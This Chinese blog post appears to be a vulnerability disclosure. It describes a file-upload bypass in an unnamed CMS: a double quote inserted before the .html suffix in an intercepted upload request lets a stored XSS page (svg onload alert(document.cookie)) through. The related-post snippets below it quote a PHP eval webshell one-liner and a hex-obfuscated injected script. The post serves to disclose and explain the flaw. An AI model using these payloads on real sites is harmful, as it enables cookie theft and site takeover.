某cms奇怪的文件上传绕过漏洞

最新推荐文章于 2024-08-04 22:21:07 发布
最新推荐文章于 2024-08-04 22:21:07 发布
阅读量884 收藏
点赞数
分类专栏: web漏洞复现 文章标签: 绕过上传限制
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/102747924
版权

0x01
给老外写的时候用的英文(谷歌翻译的)
I installed the latest version of ***(这个东西比较敏感) CMS and found upload bypass in the system
In the latest version(3.0.4), the system forbids HTML suffix name upload, but now it can bypass it.

图片.png

图片.png

0x02
Vulnerability proof

You can bypass the file upload limit by putting double quotes before the suffix of HTML

1 Visit website http://[address]:[port]/[app_path]/admin/index.php?id=filesmanager with login

2 Save html codes with '.png’extensions. and upload it like below.

<html> 
    <head> 
	    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <title>hacker</title> 
    </head> 
    <body> 
     <svg/onload=alert(document.cookie)>
    </body> 
</html>

图片.png

Click the uploaded file and Grab the packet and change the suffix name to XXX"".html at filename,This circumvents this limitation.

图片.png

图片.png

4 move to http://[address]:[port]/[app_path]/public/uploads/[uploaded file]

You can see that you executed HTML and JS code,If you access this file, you can get the administrator’s cookie and execute any JS code

图片.png

Adsatrtgo
关注
专栏目录
finecms-含有前台文件上传漏洞源码包.zip
01-04
finecms-含有前台文件上传漏洞源码包,亲测真实有效、可用!如有侵权,请联系CSDN管理员删除
[代码审计]极致CMS1.9.5存在文件上传漏洞
Y4tacker的博客
05-11 3055
文章目录极致CMSv1.9.5存在文件上传漏洞前言分析 极致CMSv1.9.5存在文件上传漏洞 前言 网上看到CNVD爆了,自己闲的没事做也稍微找一下,蛮简单的也挺常见的 分析 准备工作 首先本地创建一个php文件,这里我用1.php,内容为<?php eval($_POST[1]);?>之后把这 个文件压缩为zip后缀压缩包,上传至公网服务器即可,压缩包结构如下所示 漏洞利用点在后台插件安装处,我们任意点击一个插件点击安装抓包 发现url参数可控 在A/c/PluginsControll
常见的cms漏洞
最新发布
qq_68186313的博客
08-04 1401
2、点击【生成】--》【更新主页HTML】--》将主页位置修改为【.·/index.php】--》点击【生成静态】--》点击【更新主页】再次访问站点首页可发现变化。1、接着上一个环境使用,将带有后门的文件加入到主题中并将主题压缩为ZP文件点击【外观】-》【主题】--》【添加】--》【上传主题】--》【浏览】--》【现在安装】1、与WPCMS类似,直接修改模板拿WebShell..点击【模板】--》【默认模板管理】一》【index.htm】---》【修改】在文件修改中添加一句话代码如下。
传感与检测技术,Pt100热电阻测温实验报告,江南大学物联网(1)
2401_85015014的博客
05-16 629
/返回 x 的系数 k 公式:k = (n sum( xy ) - sum( x ) sum( y )) / (n sum( x^2 )-sum(x) ^ 2)System.out.println(“非线性误差为:” + Math.abs(maxy/fully*100) + “%”);//返回常量系数系数 b 公式:b = sum( y ) / n - k * sum( x ) / n。System.out.println(“灵敏度为:” + Math.abs(s));//返回对应项相乘后的和。
靶场上新:PigCMS任意文件上传漏洞
hackzkaq的博客
10-09 275
PigCms(又称小猪CMS)是一个基于php+mysql的多用户微信营销系统,是国内使用较多、功能强大、性能稳定的多用户微信营销系统。PigCms存在一处前台任意文件上传漏洞,攻击者可以通过该漏洞进行任意文件上传,从而获取网站权限。申明:本文所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.本文由掌控安全学院-江月投稿。
快排CMS-文件上传漏洞
LYJ20010728的博客
06-21 1691
快排CMS-文件上传漏洞环境搭建漏洞复现漏洞点一漏洞点二漏洞点三漏洞点四漏洞点五漏洞点六漏洞分析 环境搭建 下载快排cms,下载地址 使用phpstudy搭建web环境 把下载好的源码放到网站根目录下,开启phpstudy,浏览器访问安装后即可 漏洞复现 漏洞点一 漏洞点二 漏洞点三 漏洞点四 漏洞点五 漏洞点六 漏洞分析 ...
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
html文件上传漏洞,文件上传漏洞绕过姿势)
weixin_31857829的博客
06-07 1480
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿...
74cms v4.2.X任意文件读取漏洞
09-06
**74cms v4.2.X任意文件读取漏洞详解** 在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上...
CMS Made Simple v2.2.15 远程命令执行漏洞(CVE-2022-23906)
Flag少侠的博客
07-06 9152
打开靶场进入靶场页面如下点击链接登录弱口令爆破得到:admin/123456找到上传文件的地方这里尝试直接上传 PHP 不行,得上传图片可以看到有一个重命名选项将后缀名改为 PHP提示无效,不让改再尝试 copy重命名为 PHP 文件成功!!!退出 images 目录即可看到木马文件右键复制链接地址蚁剑测试连接拿到 flag。
【代码审计】QYKCMS_v4.3.2 任意文件上传漏洞分析
12-03 548
&#13;  &#13; 0x00 环境准备&#13; QYKCMS官网:http://www.qykcms.com/&#13; 网站源码版本:QYKCMS_v4.3.2(企业站主题)&#13; 程序源码下载:http://bbs.qingyunke.com/thread-13.htm&#13; 测试网站首页:&#13;  &#13; 0x01 代码分析&#13; 1、漏洞文...
超级CMS2.39-文件上传漏洞
LYJ20010728的博客
06-21 709
超级CMS2.39-文件上传漏洞环境搭建漏洞复现上传点一上传点二上传点三漏洞分析 环境搭建 下载超级CMS V2.39,下载地址 使用phpstudy搭建web环境 把下载好的源码放到网站根目录下,开启phpstudy,浏览器访问安装后即可 漏洞复现 上传点一 上传点二 上传点三 漏洞分析 存在漏洞的位置file.class.php文件中的getFileExtName方法 public function getFileExtName($filename){ $filename
大米CMS_V5.5.3 SQL注入漏洞分析
qq_50854662的博客
01-09 965
大米CMS_V5.5.3 SQL注入漏洞分析
苹果CMS漏洞
热门推荐
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
2020解决苹果CMS漏洞被挂马v8 v10最新版本
网站安全专家
01-04 4804
苹果CMS漏洞是越来越多了,国内很多电影网站都使用的是maccms V10 V8版本,就在2020年初该maccms漏洞爆发了,目前极少数的攻击者掌握了该EXP POC,受该BUG的影响,百分之80的电影站都被攻击了,很多电影站的站长找到我们SINE安全来解决网站被挂马的问题,通过分析我们发现大部分客户网站在数据库中都被插入了挂马代码,<script src=https://lefengtv...
苹果cms最新漏洞被挂马跳转劫持及清除代码
sexrenge的博客
09-03 6459
网站被挂马跳转劫持跳转到H APP下载页。 被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。 挂马图片 通过日志查看挂马过程 该漏洞是利用苹果CMS的API执行SHELL, 挂马文件在模板的jquery.min.js ;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x
苹果MAC-CMS漏洞复现(SQL注入+命令执行漏洞写shell)
信安小菜鸡的博客
05-19 3808
前台修改密码处存在sql注入漏洞 注册账户登录后发送POST 查看数据库 查看用户 不过后续操作一直被拦截,暂未找到过滤方法 命令执行漏洞 直接获取php info信息 写shell 弱口令 admin/admin/123456 ...
漏洞复现】maccms苹果cms 命令执行漏洞
失心少年
11-16 2179
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。“苹果CMS” 似乎是指 “Maccms”,这是一款开源的内容管理系统,主要用于搭建视频网站。Maccms 提供了一套完整的解决方案,包括用户管理、视频上传、分类管理、数据统计等功能,使用户能够方便地创建和管理自己的视频网站。
熊海cms文件上传漏洞
05-11
熊海CMS文件上传漏洞是指攻击者通过漏洞利用,上传恶意文件到受影响的网站上,从而达到控制网站的目的。该漏洞存在于熊海CMS系统的文件上传功能中,攻击者可以通过构造恶意的上传请求,绕过系统的上传验证机制,将恶意文件上传到服务器上。 攻击者上传的恶意文件可能包含后门、木马等恶意代码,一旦被执行,就会导致网站被入侵、数据泄露等安全问题。 为了防止该漏洞被攻击者利用,建议网站管理员及时升级熊海CMS系统的版本,或者对文件上传功能进行二次开发,增强上传文件类型的验证机制。同时,也要注意定期备份网站数据,以防止数据丢失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值